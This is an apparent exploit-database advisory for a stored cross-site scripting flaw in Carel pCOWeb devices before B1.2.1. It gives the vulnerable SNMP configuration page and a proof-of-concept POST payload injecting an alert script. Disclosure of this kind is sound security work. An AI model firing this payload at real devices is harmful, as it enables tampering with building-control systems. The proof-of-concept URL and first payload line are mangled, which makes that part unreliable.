Carel pCOWeb < B1.2.1 - Cross-Site Scripting

2019-05-22 18:05:15

# Exploit Title: Carel pCOWeb - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card

# 1. Description:
# In Carel pCOWeb web page,
# user can modify the system configuration by access the /config/pw_snmp.html.
# Attackers can inject malicious XSS code in post data.
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.

# 2. Proof of Concept:
# Browse http://<Your<http:// # Send this post data:
?script:setdb('snmp','syscontact')=">
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.